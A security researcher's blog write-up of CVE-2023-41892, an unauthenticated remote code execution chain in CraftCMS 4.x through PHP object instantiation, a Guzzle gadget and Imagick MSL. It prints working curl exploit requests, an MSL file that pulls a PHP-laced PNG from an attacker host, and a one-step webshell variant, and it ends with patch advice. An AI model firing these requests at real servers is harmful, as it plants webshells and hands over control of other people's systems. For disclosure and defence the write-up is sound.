CraftCMS is a popular content management system that is widely used and available on the Internet. Unfortunately CraftCMS versions between 4.0.0-RC1 – 4.4.14 are exposed by a vulnerability allowing attackers to execute arbitrary code remotely, potentially compromising the security and integrity of the application.

The vulnerability occurs using a PHP object creation in the \craft\controllers\ConditionsController class which allows to run arbitrary PHP code by escalating the object creation calling some methods available in \GuzzleHttp\Psr7\FnStream. Using this vulnerability in combination with The Imagick Extension and MSL which stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that facilitates the reading of images, performance of image processing tasks, and writing of results back to the filesystem. This can be leveraged to create a dummy image containing malicious PHP code using the Imagick constructor class delivering a webshell that can be accessed by the attacker, thereby executing the malicious PHP code and gaining access to the system.

Well, this is quite a mouth full, so let’s take it step by step…

Let’s first touch the part of PHP Object Creation which is the core of the issue. In this article from ptswarm written by Arseniy Sharoglazov the concept of PHP’s Arbitrary Object Instantiation is very well explained that is a flaw in which an attacker can create arbitrary objects. This flaw can come in all shapes and sizes.

Within CraftCMS versions 4.4.14 and below, this flaw can also be leveraged to run arbitrary code on a vulnerable instance.
In this blog published by Thanh on September 14, the security researchers discovered a PHP object instantiation flaw that resides in the \craft\controllers\ConditionsController class. The beforeAction method was identified and provided the ability to create an arbitrary object.
So far, so good, but you will need to find gadgets that can be used to escalate the object creation into something meaningful, like methods that allow to run code. One of these methods was found in the \GuzzleHttp\Psr7\FnStream class.

public function __destruct()
{
   if (isset($this->_fn_close)) {
       call_user_func($this->_fn_close);
   }
}

with the curl command below, you can trigger this flaw calling the method and executing the phpinfo command.

curl -sk "https://craftcms-vuln.ddev.site" -x localhost:8080 -X POST -d 'action=conditions/render&configObject[class]=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'

Capturing the response with burpsuite shows that the phpinfo is executed.

Burp response

HTTP/2 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Date: Sun, 17 Dec 2023 17:17:41 GMT
Server: nginx
X-Powered-By: Craft CMS
X-Robots-Tag: none

    <!doctype html>
<html lang="en">

<head>
    <meta charset="utf-8"/>

    <title>Invalid Configuration – yii\base\InvalidConfigException</title>

--- SNIP REMOVED CONTENT ---

<h1 class="p">PHP Version 8.1.26</h1>
</td></tr>
</table>
<table>
<tr><td class="e">
     System
    </td>
    <td class="v">
       Linux craftcms-vuln-web 6.4.16-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Nov 16 10:55:59 UTC 2023 x86_64 
     </td>
</tr>
<tr><td class="e">
    Build Date 
  </td>
  <td class="v">
    Nov 24 2023 13:12:14 
  </td>
</tr>
<tr><td class="e">
    Build System 
  </td>
<td class="v">
    Linux 
  </td>
</tr>
<tr><td class="e">
    Server API 
  </td>
<td class="v">
   FPM/FastCGI 
   </td>
</tr>
--- ETC ETC ---

This is pretty cool, but it is quite limited what you can execute.
For instance, PHP system() calls with arguments do not work as well as inline PHP code. We have to find other gadgets that can deliver a full RCE using this flaw.

Let’s go back to the article written by Arseniy Sharoglazov. In the last section of his article, he explains the Imagick Extension and more specific to use this extension in combination with the Magick Scripting Language (MSL) to trigger a full RCE using PHP object instantiation (see section Imagick Extension and RCE #2: VID Scheme).

And surprise, surprise, CraftCMS is using this Imagick Extension which allows us to build a full RCE.

Using the Imagick constructor class in combination with MSL and a VID schema allows you to read and write images. This can be used to build an out of band RCE reading an image file with PHP code from the attacker controlled host and write it back to the CraftCMS host for execution.

Step 1:
Create an MSL file (pawn.msl) that downloads a vulnerable payload from the attacker host and writes it to CraftCMS instance.

<?xml version="1.0" encoding="UTF-8"?>
<image>
 <read filename="http://attacker_ip:8000/vuln.png" />
 <write filename="/var/www/html/web/shell.php" />
</image>

Step 2:
Create the vuln.png by adding PHP code to a small PNG image and host it on the attacker machine

exiftool -comment="<?php phpinfo(); ?>" vuln.png
python3 -m http.server 8000

Step 3:
Call the Imagick constructor class to upload the MSL file.
This typically creates a MSL file with a random filename starting with php<random chars> in the /tmp directory on the CraftCMS instance.

curl -sk "https://craftcms-vuln.ddev.site" -x localhost:8080 -X POST -H 'Content-Type: multipart/form-data' -F 'action=conditions/render' -F 'configObject[class]=craft\elements\conditions\ElementCondition' -F 'config={"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}' -F 'filename=@pawn.msl'

Step 4:
Trigger the MSL file execution using Imagick constructor class again.
You should see the vulnerable PNG getting downloaded from the attacker machine and copied to shell.php on the CraftCMS instance.

curl -sk "https://craftcms-vuln.ddev.site" -x localhost:8080 -X POST -d 'action=conditions/render&configObject[class]=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"vid:msl:/tmp/php*"}}}'

Step 5:
Run the vulnerable shell code (shell.php) and you should see the phpinfo back in the response.

curl -k "https://craftcms-vuln.ddev.site/shell.php" -x localhost:8080 --output -

And things get even better, because you can avoid the out of band download by using caption: and info: schemes. The combination of both allows to create a web shell in one go using the MSL syntax below.

<?xml version="1.0" encoding="UTF-8"?>
<image>
 <read filename="caption:&lt;?php phpinfo(); ?&gt;" />
 <write filename="info:/var/www/html/web/shell.php" />
</image>

I have created a Metasploit module that checks the vulnerability of a target and makes use of the vulnerability to exploit the target. It allows you to choose from different target options such as deploying and launching a PHP webshell, performing a UNIX command injection or launching native Linux Meterpreter.
You can find the module here in my local repository or as PR 18612 at the Metasploit Github development.

Mitigation

You should update your CraftCMS application to the latest version or at least to 4.4.15.

References

CVE-2023-41892
CraftCMS RCE analysis
CraftCMS Advisory
Exploiting Arbitrary Object Instantiations in PHP without Custom Classes
CraftCMS Unauthenticated RCE – h00die-gr3y Metasploit local repository
CraftCMS Unauthenticated RCE – Metasploit PR 18612
CraftCMS Installation
CraftCMS downloading previous versions

Credits

• thanhc - https://substack.com/@thanhc discovery of the vulnerability
  
• Arseniy Sharoglazov - https://swarm.ptsecurity.com/author/arseniy-sharoglazov/
  
• chybeta - https://github.com/chybeta